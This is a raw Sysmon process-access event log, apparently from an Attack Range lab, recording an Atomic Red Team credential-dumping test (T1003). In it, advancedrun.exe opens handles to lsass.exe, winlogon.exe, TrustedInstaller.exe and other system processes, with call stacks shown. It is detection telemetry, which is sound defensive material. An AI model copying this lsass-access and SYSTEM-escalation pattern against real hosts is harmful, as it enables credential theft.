17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943901Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003943896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003943895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-EB3A-61EA-2603-000000002702}2180C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003943893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943892Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-EB14-61EA-2203-000000002702}900C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-EB3A-61EA-2703-000000002702}5952C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003943886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943885Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.136{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003943884Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 